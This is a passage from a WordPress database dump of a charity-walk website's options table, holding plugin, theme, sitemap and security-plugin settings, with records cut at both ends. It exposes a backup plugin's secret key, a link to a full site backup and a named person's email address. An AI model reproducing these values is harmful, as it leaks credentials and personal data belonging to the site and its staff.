found\";s:23:\"breadcrumbs-blog-remove\";b:0;s:20:\"breadcrumbs-boldlast\";b:0;s:25:\"breadcrumbs-archiveprefix\";s:12:\"Archives for\";s:18:\"breadcrumbs-enable\";b:0;s:16:\"breadcrumbs-home\";s:4:\"Home\";s:18:\"breadcrumbs-prefix\";s:0:\"\";s:24:\"breadcrumbs-searchprefix\";s:16:\"You searched for\";s:15:\"breadcrumbs-sep\";s:7:\"&raquo;\";s:23:\"post_types-post-maintax\";i:0;}','yes'),(160,'wpseo_xml','a:16:{s:22:\"disable_author_sitemap\";b:1;s:22:\"disable_author_noposts\";b:1;s:16:\"enablexmlsitemap\";b:1;s:16:\"entries-per-page\";i:1000;s:14:\"excluded-posts\";s:0:\"\";s:38:\"user_role-administrator-not_in_sitemap\";b:0;s:31:\"user_role-editor-not_in_sitemap\";b:0;s:31:\"user_role-author-not_in_sitemap\";b:0;s:36:\"user_role-contributor-not_in_sitemap\";b:0;s:35:\"user_role-subscriber-not_in_sitemap\";b:0;s:30:\"post_types-post-not_in_sitemap\";b:0;s:30:\"post_types-page-not_in_sitemap\";b:0;s:36:\"post_types-attachment-not_in_sitemap\";b:1;s:34:\"taxonomies-category-not_in_sitemap\";b:0;s:34:\"taxonomies-post_tag-not_in_sitemap\";b:0;s:37:\"taxonomies-post_format-not_in_sitemap\";b:0;}','yes'),(161,'wpseo_flush_rewrite','1','yes'),(162,'redux_version_upgraded_from','3.6.4','yes'),(167,'widget_akismet_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(168,'widget_cryout_serious_slider_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(170,'coreSLframework_options','a:2:{s:22:\"global_location_plugin\";a:4:{i:0;a:2:{i:0;s:9:\"*Standard\";i:1;s:3:\"std\";}i:1;a:2:{i:0;s:13:\"under Plugins\";i:1;s:7:\"plugins\";}i:2;a:2:{i:0;s:11:\"under Tools\";i:1;s:5:\"tools\";}i:3;a:2:{i:0;s:14:\"under Settings\";i:1;s:8:\"settings\";}}s:11:\"debug_level\";i:3;}','yes'),(172,'loginlockdownmsrunonce','done','no'),(173,'fw_active_extensions','a:6:{s:6:\"update\";a:0:{}s:13:\"github-update\";a:0:{}s:4:\"blog\";a:0:{}s:10:\"shortcodes\";a:0:{}s:13:\"wp-shortcodes\";a:0:{}s:7:\"builder\";a:0:{}}','yes'),(179,'wpseo_sitemap_1_cache_validator','5vI49','no'),(180,'wpseo_sitemap_page_cache_validator','3CADt','no'),(182,'sm_options','a:51:{s:18:\"sm_b_prio_provider\";s:41:\"GoogleSitemapGeneratorPrioByCountProvider\";s:9:\"sm_b_ping\";b:1;s:10:\"sm_b_stats\";b:0;s:12:\"sm_b_pingmsn\";b:1;s:12:\"sm_b_autozip\";b:1;s:11:\"sm_b_memory\";s:0:\"\";s:9:\"sm_b_time\";i:-1;s:18:\"sm_b_style_default\";b:1;s:10:\"sm_b_style\";s:0:\"\";s:12:\"sm_b_baseurl\";s:0:\"\";s:11:\"sm_b_robots\";b:1;s:9:\"sm_b_html\";b:1;s:12:\"sm_b_exclude\";a:0:{}s:17:\"sm_b_exclude_cats\";a:0:{}s:10:\"sm_in_home\";b:1;s:11:\"sm_in_posts\";b:1;s:15:\"sm_in_posts_sub\";b:0;s:11:\"sm_in_pages\";b:1;s:10:\"sm_in_cats\";b:0;s:10:\"sm_in_arch\";b:0;s:10:\"sm_in_auth\";b:0;s:10:\"sm_in_tags\";b:0;s:9:\"sm_in_tax\";a:0:{}s:17:\"sm_in_customtypes\";a:0:{}s:13:\"sm_in_lastmod\";b:1;s:10:\"sm_cf_home\";s:5:\"daily\";s:11:\"sm_cf_posts\";s:7:\"monthly\";s:11:\"sm_cf_pages\";s:6:\"weekly\";s:10:\"sm_cf_cats\";s:6:\"weekly\";s:10:\"sm_cf_auth\";s:6:\"weekly\";s:15:\"sm_cf_arch_curr\";s:5:\"daily\";s:14:\"sm_cf_arch_old\";s:6:\"yearly\";s:10:\"sm_cf_tags\";s:6:\"weekly\";s:10:\"sm_pr_home\";d:1;s:11:\"sm_pr_posts\";d:0.59999999999999998;s:15:\"sm_pr_posts_min\";d:0.20000000000000001;s:11:\"sm_pr_pages\";d:0.59999999999999998;s:10:\"sm_pr_cats\";d:0.29999999999999999;s:10:\"sm_pr_arch\";d:0.29999999999999999;s:10:\"sm_pr_auth\";d:0.29999999999999999;s:10:\"sm_pr_tags\";d:0.29999999999999999;s:12:\"sm_i_donated\";b:0;s:17:\"sm_i_hide_donated\";b:0;s:17:\"sm_i_install_date\";i:1494324685;s:14:\"sm_i_hide_note\";b:0;s:15:\"sm_i_hide_works\";b:0;s:16:\"sm_i_hide_donors\";b:0;s:9:\"sm_i_hash\";s:20:\"db66c88bd32cb39aa3f3\";s:13:\"sm_i_lastping\";i:1545213829;s:16:\"sm_i_supportfeed\";b:1;s:22:\"sm_i_supportfeed_cache\";i:1508844434;}','yes'),(183,'sm_status','O:28:\"GoogleSitemapGeneratorStatus\":4:{s:39:\"\0GoogleSitemapGeneratorStatus\0startTime\";d:1545213827.9622059;s:37:\"\0GoogleSitemapGeneratorStatus\0endTime\";d:1545213828.695205;s:41:\"\0GoogleSitemapGeneratorStatus\0pingResults\";a:2:{s:6:\"google\";a:5:{s:9:\"startTime\";d:1545213827.992116;s:7:\"endTime\";d:1545213828.1204791;s:7:\"success\";b:1;s:3:\"url\";s:105:\"http://www.google.com/webmasters/sitemaps/ping?sitemap=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fsitemap.xml\";s:4:\"name\";s:6:\"Google\";}s:4:\"bing\";a:5:{s:9:\"startTime\";d:1545213828.142998;s:7:\"endTime\";d:1545213828.546216;s:7:\"success\";b:1;s:3:\"url\";s:98:\"http://www.bing.com/webmaster/ping.aspx?siteMap=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fsitemap.xml\";s:4:\"name\";s:4:\"Bing\";}}s:38:\"\0GoogleSitemapGeneratorStatus\0autoSave\";b:1;}','no'),(190,'current_theme','Property Builder','yes'),(191,'theme_mods_enigma','a:4:{i:0;b:0;s:18:\"custom_css_post_id\";i:-1;s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:2;}s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1506011886;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:18:\"dw_megamenu_widget\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:15:\"sidebar-primary\";a:0:{}s:18:\"footer-widget-area\";a:0:{}}}}','yes'),(192,'theme_switched','','yes'),(194,'wpseo_sitemap_cache_validator_global','3GDqZ','no'),(195,'category_children','a:0:{}','yes'),(215,'Admin_custome_login_Version','s:30:\"a:1:{s:7:\"Version\";s:3:\"1.0\";}\";','yes'),(216,'Admin_custome_login_dashboard','s:44:\"a:1:{s:16:\"dashboard_status\";s:7:\"disable\";}\";','yes'),(217,'Admin_custome_login_top','s:410:\"a:9:{s:11:\"top_bg_type\";s:23:\"static-background-image\";s:9:\"top_color\";s:7:\"#f9fad2\";s:9:\"top_image\";s:90:\"http://equalitywalk.org.uk/wp-content/plugins/admin-custom-login//images/3d-background.jpg\";s:9:\"top_cover\";s:3:\"yes\";s:10:\"top_repeat\";s:6:\"repeat\";s:12:\"top_position\";s:8:\"left top\";s:14:\"top_attachment\";s:5:\"fixed\";s:16:\"top_slideshow_no\";s:1:\"6\";s:23:\"top_bg_slider_animation\";s:13:\"slider-style1\";}\";','yes'),(218,'Admin_custome_login_login','s:833:\"a:20:{s:19:\"login_form_position\";s:7:\"default\";s:16:\"login_form_float\";s:6:\"center\";s:15:\"login_form_left\";s:3:\"700\";s:14:\"login_form_top\";s:3:\"300\";s:16:\"login_custom_css\";s:0:\"\";s:19:\"login_redirect_user\";s:0:\"\";s:13:\"login_bg_type\";s:23:\"static-background-image\";s:14:\"login_bg_color\";s:7:\"#1e73be\";s:15:\"login_bg_effect\";s:9:\"pattern-1\";s:14:\"login_bg_image\";s:90:\"http://equalitywalk.org.uk/wp-content/plugins/admin-custom-login//images/3d-background.jpg\";s:18:\"login_form_opacity\";s:2:\"10\";s:16:\"login_form_width\";s:3:\"520\";s:17:\"login_form_radius\";s:2:\"10\";s:18:\"login_border_style\";s:5:\"solid\";s:21:\"login_border_thikness\";s:1:\"4\";s:18:\"login_border_color\";s:7:\"#0069A0\";s:15:\"login_bg_repeat\";s:6:\"repeat\";s:17:\"login_bg_position\";s:8:\"left top\";s:19:\"login_enable_shadow\";s:3:\"yes\";s:18:\"login_shadow_color\";s:7:\"#C8C8C8\";}\";','yes'),(219,'Admin_custome_login_text','s:627:\"a:17:{s:18:\"heading_font_color\";s:7:\"#ffffff\";s:16:\"input_font_color\";s:7:\"#000000\";s:10:\"link_color\";s:7:\"#ffffff\";s:12:\"button_color\";s:7:\"#dd3333\";s:17:\"heading_font_size\";s:2:\"14\";s:15:\"input_font_size\";s:2:\"18\";s:9:\"link_size\";s:2:\"14\";s:16:\"button_font_size\";s:2:\"14\";s:18:\"enable_link_shadow\";s:3:\"yes\";s:17:\"link_shadow_color\";s:7:\"#ffffff\";s:18:\"heading_font_style\";s:9:\"Open Sans\";s:16:\"input_font_style\";s:9:\"Open Sans\";s:15:\"link_font_style\";s:9:\"Open Sans\";s:17:\"button_font_style\";s:9:\"Open Sans\";s:20:\"enable_inputbox_icon\";s:3:\"yes\";s:15:\"user_input_icon\";s:7:\"fa-user\";s:19:\"password_input_icon\";s:6:\"fa-key\";}\";','yes'),(220,'Admin_custome_login_logo','s:279:\"a:5:{s:10:\"logo_image\";s:89:\"http://equalitywalk.org.uk/wp-content/plugins/admin-custom-login//images/default-logo.png\";s:10:\"logo_width\";s:3:\"274\";s:11:\"logo_height\";s:2:\"63\";s:8:\"logo_url\";s:26:\"http://equalitywalk.org.uk\";s:14:\"logo_url_title\";s:23:\"Your Site Name and Info\";}\";','yes'),(221,'Admin_custome_login_Social','s:841:\"a:19:{s:18:\"enable_social_icon\";s:5:\"outer\";s:16:\"social_icon_size\";s:6:\"mediam\";s:18:\"social_icon_layout\";s:9:\"rectangle\";s:17:\"social_icon_color\";s:7:\"#ffffff\";s:25:\"social_icon_color_onhover\";s:7:\"#1e73be\";s:14:\"social_icon_bg\";s:7:\"#1e73be\";s:22:\"social_icon_bg_onhover\";s:7:\"#ffffff\";s:20:\"social_facebook_link\";s:19:\"http://facebook.com\";s:19:\"social_twitter_link\";s:33:\"https://twitter.com/minimalmonkey\";s:20:\"social_linkedin_link\";s:0:\"\";s:23:\"social_google_plus_link\";s:22:\"http://plus.google.com\";s:21:\"social_pinterest_link\";s:0:\"\";s:16:\"social_digg_link\";s:0:\"\";s:19:\"social_youtube_link\";s:19:\"https://youtube.com\";s:18:\"social_flickr_link\";s:18:\"https://flickr.com\";s:18:\"social_tumblr_link\";s:0:\"\";s:21:\"social_vkontakte_link\";s:0:\"\";s:17:\"social_skype_link\";s:0:\"\";s:21:\"social_instagram_link\";s:21:\"https://instagram.com\";}\";','yes'),(222,'Admin_custome_login_Slidshow','s:949:\"a:12:{s:16:\"Slidshow_image_1\";s:88:\"http://equalitywalk.org.uk/wp-content/plugins/admin-custom-login//images/rpg-default.jpg\";s:16:\"Slidshow_image_2\";s:88:\"http://equalitywalk.org.uk/wp-content/plugins/admin-custom-login//images/rpg-default.jpg\";s:16:\"Slidshow_image_3\";s:88:\"http://equalitywalk.org.uk/wp-content/plugins/admin-custom-login//images/rpg-default.jpg\";s:16:\"Slidshow_image_4\";s:88:\"http://equalitywalk.org.uk/wp-content/plugins/admin-custom-login//images/rpg-default.jpg\";s:16:\"Slidshow_image_5\";s:88:\"http://equalitywalk.org.uk/wp-content/plugins/admin-custom-login//images/rpg-default.jpg\";s:16:\"Slidshow_image_6\";s:88:\"http://equalitywalk.org.uk/wp-content/plugins/admin-custom-login//images/rpg-default.jpg\";s:22:\"Slidshow_image_label_1\";s:0:\"\";s:22:\"Slidshow_image_label_2\";s:0:\"\";s:22:\"Slidshow_image_label_3\";s:0:\"\";s:22:\"Slidshow_image_label_4\";s:0:\"\";s:22:\"Slidshow_image_label_5\";s:0:\"\";s:22:\"Slidshow_image_label_6\";s:0:\"\";}\";','yes'),(223,'wpseo_sitemap_category_cache_validator','3F4Bv','no'),(226,'wpseo_sitemap_post_cache_validator','stIe','no'),(231,'weblizar_rcsm_options','a:81:{s:15:\"select_template\";s:16:\"select_template1\";s:15:\"page_meta_title\";s:43:\"equality walk - Just another WordPress site\";s:18:\"page_meta_keywords\";s:0:\"\";s:21:\"page_meta_discription\";s:56:\"Our website is under construction. It will be live soon.\";s:13:\"search_robots\";s:2:\"on\";s:16:\"rcsm_robots_meta\";s:12:\"index follow\";s:20:\"upload_image_favicon\";s:97:\"http://equalitywalk.org.uk/wp-content/plugins/responsive-coming-soon-page/options/images/logo.png\";s:13:\"layout_status\";s:10:\"deactivate\";s:17:\"coming-soon_title\";s:26:\"Our Site Is Coming Soon!!!\";s:21:\"coming-soon_sub_title\";s:32:\"Stay Tuned For Something Amazing\";s:19:\"coming-soon_message\";s:41:\"Responsive Design & Faster User Interface\";s:9:\"site_logo\";s:10:\"logo_image\";s:15:\"logo_text_value\";s:13:\"equality walk\";s:17:\"upload_image_logo\";s:97:\"http://equalitywalk.org.uk/wp-content/plugins/responsive-coming-soon-page/options/images/logo.png\";s:11:\"logo_height\";s:3:\"150\";s:10:\"logo_width\";s:3:\"250\";s:8:\"bg_color\";s:7:\"#0098ff\";s:18:\"template_bg_select\";s:17:\"Custom_Background\";s:13:\"custom_bg_img\";s:100:\"http://equalitywalk.org.uk/wp-content/plugins/responsive-coming-soon-page/options/images/cg_img1.jpg\";s:12:\"button_onoff\";s:2:\"on\";s:11:\"button_text\";s:13:\"DISCOVER MORE\";s:16:\"button_text_link\";s:6:\"#timer\";s:10:\"link_admin\";s:2:\"on\";s:15:\"admin_link_text\";s:15:\"Admin Dashboard\";s:10:\"user_value\";a:0:{}s:16:\"page_layout_swap\";a:2:{i:0;s:16:\"Count Down Timer\";i:1;s:15:\"Subscriber Form\";}s:19:\"theme_color_schemes\";s:7:\"#eb5054\";s:13:\"social_icon_1\";s:14:\"fa fa-facebook\";s:13:\"social_icon_2\";s:13:\"fa fa-twitter\";s:13:\"social_icon_3\";s:17:\"fa fa-google-plus\";s:13:\"social_icon_4\";s:14:\"fa fa-linkedin\";s:13:\"social_icon_5\";s:15:\"fa fa-pinterest\";s:13:\"social_link_1\";s:1:\"#\";s:13:\"social_link_2\";s:1:\"#\";s:13:\"social_link_3\";s:1:\"#\";s:13:\"social_link_4\";s:1:\"#\";s:13:\"social_link_5\";s:1:\"#\";s:10:\"link_tab_1\";s:3:\"off\";s:10:\"link_tab_2\";s:3:\"off\";s:10:\"link_tab_3\";s:3:\"off\";s:10:\"link_tab_4\";s:3:\"off\";s:10:\"link_tab_5\";s:3:\"off\";s:18:\"total_Social_links\";s:1:\"5\";s:16:\"social_icon_list\";s:0:\"\";s:15:\"subscriber_form\";s:2:\"on\";s:21:\"subscriber_form_title\";s:27:\"SUBSCRIBE TO OUR NEWSLETTER\";s:20:\"subscriber_form_icon\";s:16:\"fa fa-envelope-o\";s:25:\"subscriber_form_sub_title\";s:61:\"In the mean time connect with us to subscribed our newsletter\";s:23:\"subscriber_form_message\";s:92:\"Subscribe and we\'ll notify you on our launch. We\'ll also throw in a freebie for your effort.\";s:20:\"sub_form_button_text\";s:9:\"Subscribe\";s:22:\"sub_form_button_f_name\";s:10:\"First Name\";s:22:\"sub_form_button_l_name\";s:9:\"Last Name\";s:24:\"sub_form_subscribe_title\";s:5:\"Email\";s:9:\"user_sets\";s:14:\"$user_sets_all\";s:35:\"sub_form_subscribe_seuccess_message\";s:42:\"Thank you! We will be back with the quote.\";s:34:\"sub_form_subscribe_invalid_message\";s:28:\"You have already subscribed.\";s:19:\"subscriber_msg_body\";s:0:\"\";s:42:\"sub_form_subscribe_confirm_success_message\";s:83:\"Thank You!!! Subscription has been confirmed. We will notify when the site is live.\";s:42:\"sub_form_subscribe_already_confirm_message\";s:73:\"You subscription is already active. We will notify when the site is live.\";s:37:\"sub_form_invalid_confirmation_message\";s:36:\"Error: Invalid subscription details.\";s:16:\"subscribe_select\";s:7:\"wp_mail\";s:16:\"wp_mail_email_id\";s:32:\"amber.platts@vanillacircus.co.uk\";s:23:\"confirm_email_subscribe\";s:3:\"off\";s:23:\"auto_sentto_activeusers\";s:2:\"on\";s:28:\"subscriber_users_mail_option\";s:9:\"all_users\";s:23:\"subscriber_mail_subject\";s:0:\"\";s:23:\"subscriber_mail_message\";s:0:\"\";s:13:\"counter_title\";s:17:\"We\'re Coming Soon\";s:18:\"counter_title_icon\";s:13:\"fa fa-clock-o\";s:11:\"counter_msg\";s:45:\"We Are Currently Working On Something Awesome\";s:18:\"disable_the_plugin\";s:3:\"off\";s:16:\"maintenance_date\";s:16:\"2017/05/16 10:22\";s:21:\"footer_copyright_text\";s:68:\"Copyright © 2016 Weblizar Themes & Plugins | All Rights Reserved By\";s:11:\"footer_link\";s:20:\"https://weblizar.com\";s:16:\"footer_link_text\";s:8:\"Weblizar\";s:10:\"custom_css\";s:0:\"\";s:16:\"google_analytics\";s:0:\"\";s:13:\"feedback_mail\";s:0:\"\";s:16:\"feedback_heading\";s:16:\"Book Appointment\";s:13:\"feedback_icon\";s:14:\"fa fa-calendar\";s:12:\"feedback_btn\";s:19:\"Booking Appointment\";}','yes'),(4949,'WPLANG','','yes'),(4952,'wdr_admin_notices_show','0','yes'),(5004,'widget_authorize_recent_posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(5005,'theme_mods_authorize','a:1:{s:18:\"custom_css_post_id\";i:-1;}','yes'),(5081,'quick-featured-images-settings','a:3:{s:17:\"column_thumb_post\";s:1:\"1\";s:17:\"column_thumb_page\";s:1:\"1\";s:22:\"minimum_role_all_pages\";s:6:\"editor\";}','yes'),(5087,'quick-featured-images-defaults','a:0:{}','yes'),(5088,'widget_hitmag_single_category_posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(5089,'widget_hitmag_dual_category_posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(5090,'widget_hitmag_grid_category_posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(5091,'widget_sidebar_posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(5092,'widget_hitmag_tabbed_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(5093,'theme_mods_hitmag','a:1:{s:18:\"custom_css_post_id\";i:-1;}','yes'),(5099,'theme_mods_city-store','a:6:{s:18:\"custom_css_post_id\";i:-1;s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:2;}s:16:\"background_image\";s:0:\"\";s:21:\"background_position_y\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1631796411;s:4:\"data\";a:9:{s:19:\"wp_inactive_widgets\";a:0:{}s:18:\"dw_megamenu_widget\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:15:\"sidebar-primary\";a:0:{}s:18:\"footer-widget-area\";a:0:{}s:23:\"city_store_main_sidebar\";a:2:{i:0;s:10:\"calendar-3\";i:1;s:7:\"pages-3\";}s:19:\"city_store_footer_1\";a:1:{i:0;s:14:\"recent-posts-4\";}s:19:\"city_store_footer_2\";a:1:{i:0;s:10:\"archives-4\";}s:19:\"city_store_footer_3\";a:1:{i:0;s:6:\"text-3\";}s:19:\"city_store_footer_4\";a:2:{i:0;s:5:\"rss-3\";i:1;s:8:\"search-4\";}}}}','yes'),(5102,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:0:{}}','yes'),(5104,'theme_switched_via_customizer','','yes'),(5105,'city_store_theme_options','a:14:{s:33:\"city_store_featured_page_slider_1\";s:2:\"89\";s:33:\"city_store_featured_page_slider_2\";s:2:\"70\";s:33:\"city_store_featured_page_slider_3\";s:2:\"56\";s:33:\"city_store_featured_page_slider_4\";s:2:\"57\";s:26:\"city_store_social_facebook\";s:1:\"/\";s:25:\"city_store_social_twitter\";s:1:\"/\";s:27:\"city_store_social_pinterest\";s:1:\"/\";s:26:\"city_store_social_dribbble\";s:1:\"/\";s:27:\"city_store_social_instagram\";s:2:\"//\";s:24:\"city_store_social_flickr\";s:1:\"/\";s:28:\"city_store_social_googleplus\";s:1:\"/\";s:26:\"city_store_contact_address\";s:12:\"0845 2121212\";s:24:\"city_store_contact_skype\";s:7:\"6464644\";s:24:\"city_store_contact_email\";s:25:\"money@equalitywalk.org.uk\";}','yes'),(5106,'customize_stashed_theme_mods','a:1:{s:6:\"hitmag\";a:1:{s:11:\"show_slider\";a:3:{s:5:\"value\";b:1;s:4:\"type\";s:9:\"theme_mod\";s:7:\"user_id\";i:1;}}}','no'),(5223,'far_plugin_settings','a:2:{s:7:\"farfind\";a:1:{i:0;s:6:\"&nbsp;\";}s:10:\"farreplace\";a:1:{i:0;s:0:\"\";}}','yes'),(40624,'wpseo_sitemap_author_cache_validator','sGAk','no'),(51609,'ai1wm_secret_key','PfvrZQB5ciVT','yes'),(51610,'ai1wm_status','a:2:{s:4:\"type\";s:8:\"download\";s:7:\"message\";s:352:\"<a href=\"http://www.equalitywalk.org.uk/wp-content/ai1wm-backups/www.equalitywalk.org.uk-20201008-122741-meo2vp.wpress\" class=\"ai1wm-button-green ai1wm-emphasize ai1wm-button-download\" title=\"www.equalitywalk.org.uk\" download=\"www.equalitywalk.org.uk-20201008-122741-meo2vp.wpress\"><span>Download www.equalitywalk.org.uk</span><em>Size: 113 MB</em></a>\";}','yes'),(51624,'ai1wm_updater','a:0:{}','yes'),(57530,'wfls_last_role_change','1624358011','no'),(57531,'wordfence_version','7.5.4','yes'),(57532,'wordfence_case','1','yes'),(57533,'wordfence_installed','1','yes'),(57534,'wordfenceActivated','0','yes'),(57535,'active_plugins','a:4:{i:0;s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";i:1;s:25:\"sucuri-scanner/sucuri.php\";i:2;s:23:\"wp-cerber/wp-cerber.php\";i:3;s:49:\"zotya-htaccess-protect/zotya-htaccess-protect.php\";}','yes'),(57536,'wf_plugin_act_error','','yes'),(57546,'_cerber_db_errors','a:11:{i:0;a:3:{i:0;s:54:\"Table \'equalitywalkorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:73:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"_nexus_mode\" AND the_id = 0\";i:2;d:1624621859.641788;}i:1;a:3:{i:0;s:54:\"Table \'equalitywalkorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:74:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"admin_notice\" AND the_id = 0\";i:2;d:1624621859.676401;}i:2;a:3:{i:0;s:54:\"Table \'equalitywalkorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:101:\"INSERT INTO wp_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"admin_notice\",0,\"a:0:{}\",0)\";i:2;d:1624621859.676514;}i:3;a:3:{i:0;s:54:\"Table \'equalitywalkorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:75:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"admin_message\" AND the_id = 0\";i:2;d:1624621859.67662;}i:4;a:3:{i:0;s:54:\"Table \'equalitywalkorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:102:\"INSERT INTO wp_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"admin_message\",0,\"a:0:{}\",0)\";i:2;d:1624621859.676724;}i:5;a:3:{i:0;s:54:\"Table \'equalitywalkorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:79:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"cerber_admin_wide\" AND the_id = 0\";i:2;d:1624621859.676798;}i:6;a:3:{i:0;s:54:\"Table \'equalitywalkorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:100:\"INSERT INTO wp_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"cerber_admin_wide\",0,\"\",0)\";i:2;d:1624621859.676827;}i:7;a:3:{i:0;s:44:\"Duplicate entry \'103.27.236.13\' for key \'ip\'\";i:1;s:146:\"INSERT INTO cerber_blocks (ip,block_until,reason,reason_id) VALUES (\"103.27.236.13\",1642678919,\"Multiple suspicious activities were detected\",707)\";i:2;d:1642675319.311893;}i:8;a:3:{i:0;s:43:\"Duplicate entry \'182.50.132.2\' for key \'ip\'\";i:1;s:145:\"INSERT INTO cerber_blocks (ip,block_until,reason,reason_id) VALUES (\"182.50.132.2\",1645969817,\"Multiple suspicious activities were detected\",707)\";i:2;d:1645966217.423032;}i:9;a:3:{i:0;s:43:\"Duplicate entry \'202.164.60.6\' for key \'ip\'\";i:1;s:135:\"INSERT INTO cerber_blocks (ip,block_until,reason,reason_id) VALUES (\"202.164.60.6\",1653162374,\"Limit on login attempts is reached\",701)\";i:2;d:1653158774.728174;}i:10;a:3:{i:0;s:42:\"Duplicate entry \'159.8.170.5\' for key \'ip\'\";i:1;s:144:\"INSERT INTO cerber_blocks (ip,block_until,reason,reason_id) VALUES (\"159.8.170.5\",1658861506,\"Multiple suspicious activities were detected\",707)\";i:2;d:1658857906.422893;}}','no'),(57547,'cerber-main','a:38:{s:9:\"boot-mode\";i:0;s:8:\"attempts\";i:5;s:6:\"period\";i:30;s:7:\"lockout\";i:60;s:8:\"agperiod\";i:24;s:7:\"aglocks\";i:2;s:6:\"aglast\";i:4;s:10:\"limitwhite\";i:0;s:11:\"nologinhint\";i:0;s:15:\"nologinhint_msg\";s:0:\"\";s:10:\"nopasshint\";i:0;s:14:\"nopasshint_msg\";s:0:\"\";s:5:\"proxy\";i:0;s:10:\"cookiepref\";s:0:\"\";s:6:\"subnet\";i:0;s:8:\"nonusers\";i:0;s:7:\"wplogin\";i:0;s:10:\"noredirect\";i:0;s:7:\"page404\";s:0:\"\";s:9:\"loginpath\";s:0:\"\";s:9:\"loginnowp\";i:0;s:13:\"logindeferred\";i:0;s:10:\"citadel_on\";s:1:\"1\";s:7:\"cilimit\";i:200;s:8:\"ciperiod\";i:15;s:10:\"ciduration\";i:60;s:8:\"cinotify\";s:0:\"\";s:7:\"keeplog\";i:30;s:12:\"keeplog_auth\";i:30;s:8:\"ip_extra\";s:0:\"\";s:9:\"cerberlab\";i:0;s:11:\"cerberproto\";i:0;s:7:\"usefile\";i:0;s:10:\"dateformat\";s:0:\"\";s:10:\"plain_date\";i:0;s:10:\"admin_lang\";i:0;s:14:\"top_admin_menu\";i:0;s:14:\"no_white_my_ip\";i:0;}','no'),(57548,'cerber-hardening','a:14:{s:8:\"stopenum\";s:0:\"\";s:15:\"stopenum_oembed\";s:0:\"\";s:16:\"stopenum_sitemap\";i:0;s:8:\"adminphp\";i:0;s:8:\"phpnoupl\";i:0;s:8:\"nophperr\";s:0:\"\";s:6:\"xmlrpc\";i:0;s:7:\"nofeeds\";i:0;s:10:\"norestuser\";s:0:\"\";s:6:\"norest\";i:0;s:8:\"restauth\";s:0:\"\";s:9:\"restroles\";a:1:{i:0;s:13:\"administrator\";}s:9:\"restwhite\";a:2:{i:0;s:6:\"oembed\";i:1;s:14:\"wp-site-health\";}s:9:\"cleanhead\";s:0:\"\";}','no'),(57549,'cerber-users','a:19:{s:8:\"authonly\";i:0;s:11:\"authonlyacl\";i:0;s:11:\"authonlymsg\";s:68:\"Only registered and logged in users are allowed to view this website\";s:13:\"authonlyredir\";s:0:\"\";s:8:\"regwhite\";i:0;s:12:\"regwhite_msg\";s:0:\"\";s:12:\"reglimit_num\";i:3;s:12:\"reglimit_min\";i:60;s:6:\"emrule\";i:0;s:6:\"emlist\";a:0:{}s:10:\"prohibited\";a:0:{}s:7:\"app_pwd\";s:0:\"\";s:11:\"auth_expire\";s:0:\"\";s:8:\"usersort\";s:0:\"\";s:11:\"pdata_erase\";i:0;s:14:\"pdata_sessions\";i:0;s:12:\"pdata_export\";i:0;s:9:\"pdata_act\";i:0;s:9:\"pdata_trf\";a:0:{}}','no'),(57550,'cerber-antispam','a:10:{s:8:\"botscomm\";s:0:\"\";s:7:\"botsreg\";i:0;s:7:\"botsany\";i:0;s:8:\"botssafe\";i:0;s:10:\"botsnoauth\";s:0:\"\";s:10:\"customcomm\";i:0;s:9:\"botswhite\";s:0:\"\";s:8:\"spamcomm\";i:0;s:10:\"trashafter\";i:7;s:18:\"trashafter-enabled\";i:0;}','no'),(57551,'cerber-recaptcha','a:14:{s:7:\"sitekey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:9:\"invirecap\";i:0;s:10:\"recaplogin\";i:0;s:9:\"recaplost\";i:0;s:8:\"recapreg\";i:0;s:13:\"recapwoologin\";i:0;s:12:\"recapwoolost\";i:0;s:11:\"recapwooreg\";i:0;s:8:\"recapcom\";i:0;s:12:\"recapcomauth\";i:0;s:16:\"recaptcha-period\";i:60;s:16:\"recaptcha-number\";i:3;s:16:\"recaptcha-within\";i:30;}','no'),(57552,'cerber-notifications','a:11:{s:6:\"notify\";s:0:\"\";s:5:\"above\";i:3;s:5:\"email\";s:0:\"\";s:9:\"emailrate\";i:12;s:14:\"notify-new-ver\";s:1:\"1\";s:7:\"pbtoken\";s:0:\"\";s:8:\"pbdevice\";s:0:\"\";s:12:\"wreports-day\";s:1:\"1\";s:13:\"wreports-time\";i:9;s:12:\"email-report\";s:0:\"\";s:13:\"enable-report\";s:1:\"1\";}','no